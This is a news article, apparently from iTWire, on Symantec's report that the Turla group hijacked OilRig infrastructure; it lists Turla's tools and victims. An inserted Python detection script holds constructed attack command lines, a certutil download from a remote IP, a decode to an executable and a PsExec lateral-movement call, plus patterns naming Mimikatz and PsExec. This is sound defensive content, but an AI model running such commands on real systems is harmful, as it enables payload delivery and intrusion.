Turla then used this infrastructure in an attack on a government in the Middle East which OilRig had already compromised, the company claimed in a detailed blog post.
[Given the numerous names bestowed on these attack groups, iTWire will use only Turla and OilRig in this article to avoid confusion.]
But this phenomenon was hinted at in research presented by Kaspersky (formerly Kaspersky Lab) researcher Kurt Baumgartner at his employer's annual security analyst summit in Cancun last year. A Russian-speaking online threat actor, Sofacy, sometimes overlapped with other threat actors like Turla and the Chinese-speaking Danti, when targeting victims, his research claimed.
Of interest, given the recent brouhaha over stolen NSA exploits, was Symantec's claim that in the course of its attacks, Turla used a custom hacking tool that combined four tools leaked by the Shadow Brokers — EternalBlue, EternalRomance, DoublePulsar and SMBTouch — into a single executable.
Actors from Turla have been observed to be Russian speakers, while OilRig has been linked to Iran by the security firm FireEye which, admittedly, is quick to attribute attacks, something other companies are reluctant to do.
The Symantec post comes at a time of rising US pressure on Iran, following the downing of an American spy drone over Iranian territory, as per claims from Teheran. The Americans claim the incident took place over international waters.
Russia has been under US pressure for a long time, ever since claims were made that it played a role in the US presidential election of 2016. An investigation of more than two years by former FBI chief Robert Mueller failed to come up with any definitive evidence to support this claim.
Symantec's DeepSight Adversary Intelligence Team said recent activity by Turla could be divided into three campaigns, based on the toolsets used. One used a new backdoor called Neptun that acts as a passive listening tool and infects Microsoft Exchange servers. It was an attack during this campaign that used infrastructure belonging to OilRig.
A second campaign used the publicly available backdoor Meterpreter, along with two custom loaders - a custom backdoor photobased.dll and a custom RPC (Remote Procedure Call) backdoor. A third campaign used a different RPC backdoor built from code derived from PowerShellRunner, a tool that is used to execute PowerShell scripts without using the official PowerShell binary.
Victims of the three Turla campaigns were listed as:
- The foreign affairs ministry of a Latin American country;
- The foreign affairs ministry of a Middle Eastern country;
- The foreign affairs ministry of a European country;
- The interior ministry of a South Asian country;
- Two unidentified government organisations in a Middle Eastern country;
- One unidentified government organisation in a Southeast Asian country;
- A government office of a South Asian country based in another country;
- An information and communications technology organisation in a Middle Eastern country;
- Two information and communications technology organisations in two European countries;
- An information and communications technology organisation in a South Asian country;
- A multinational organisation in a Middle Eastern country; and
- An educational institution in a South Asian country.
Regarding the hijacking of OilRig infrastructure by Turla, Symantec said it was possible that the two groups were, instead, collaborating in attacking the same victim, a target in the Middle East. But it said it had not found further evidence in support of this theory.
"In all likelihood, Turla’s use of OilRig infrastructure appears to have been a hostile takeover," the Symantec team speculated. "Curiously though, Turla also compromised other computers on the victim’s network using its own infrastructure."
Turla's recent campaigns have been marked by the deployment of new tools, Symantec said, listing the following:
- A new custom dropper typically used to install Neptun as a service.
- A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable.
- A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive.
- Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Turla command and control (C&C) servers.
- PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Turla C&Cs.
- Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified as being downloaded via Turla tools or infrastructure.
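As an added illustration, not part of the iTWire article or of Symantec's research, the following Python snippet shows how a defender might flag the living-off-the-land usage listed above (Certutil.exe downloading or decoding files, and the named public tools) in process-creation telemetry. The event records, paths and hostnames are constructed for the example.

```python
import re
from collections import Counter

# Constructed process-creation events (not taken from the Symantec report), each
# as "image path|command line", the two fields a Sysmon- or EDR-style record carries.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://192.0.2.10/update.txt C:\Users\Public\u.txt",
    r"C:\Windows\System32\certutil.exe|certutil.exe -decode C:\Users\Public\u.txt C:\Users\Public\u.exe",
    r"C:\Windows\System32\certutil.exe|certutil.exe -verify C:\Temp\site.cer",
    r"C:\Tools\PsExec.exe|PsExec.exe \\fileserver01 cmd.exe",
    r"C:\Windows\System32\notepad.exe|notepad.exe C:\Users\alice\notes.txt",
]

# Tool names from the article's list, matched against the lower-cased image file name.
KNOWN_TOOLS = ("psexec", "mimikatz", "nbtscan", "sscan", "intelliadmin")

# certutil switches that indicate a remote fetch or a base64/hex decode rather than
# ordinary certificate handling (-verify, -store, ...), which is left alone.
CERTUTIL_FLAGS = {
    "certutil_download": re.compile(r"(?i)\s-urlcache\b"),
    "certutil_decode": re.compile(r"(?i)\s-decode(hex)?\b"),
}


def classify(event: str) -> list[str]:
    """Return the detection labels that apply to one event (empty list = benign)."""
    image, _, cmdline = event.partition("|")
    basename = image.rsplit("\\", 1)[-1].lower()
    labels = []
    if basename == "certutil.exe":
        for label, pattern in CERTUTIL_FLAGS.items():
            if pattern.search(cmdline):
                labels.append(label)
    for tool in KNOWN_TOOLS:
        if tool in basename:
            labels.append(f"known_tool:{tool}")
    return labels


def scan(events: list[str]) -> Counter:
    """Tally labels across all events; any non-zero count is an investigation lead."""
    tally: Counter = Counter()
    for ev in events:
        tally.update(classify(ev))
    return tally


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev) or "-", "<-", ev.split("|", 1)[1][:60])
    print(scan(SAMPLE_EVENTS))
```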
Symantec said there could be a number of reasons for the attackers behind Turla choosing to use infrastructure from OilRig.
One was as a false flag operation, to deceive anyone observing the campaign as to the identity of the actual attacker. A second possibility was that Turla used OilRig's infrastructure as the latter had already gained entry to the target.
"This is the first time Symantec has observed one targeted attack group seemingly hijack and use the infrastructure of another group. However, it is still difficult to ascertain the motive behind the attack. Whether Turla simply seized the opportunity to create confusion about the attack or whether there was more strategic thinking involved remains unknown," the researchers wrote.
"Turla's ever-changing toolset demonstrates a high degree of adaptability by a group determined to avoid detection by staying one step ahead of its targets. Frequent retooling and a penchant for flirting with false flag tactics have made this group one of the most challenging adversaries on the targeted attack landscape."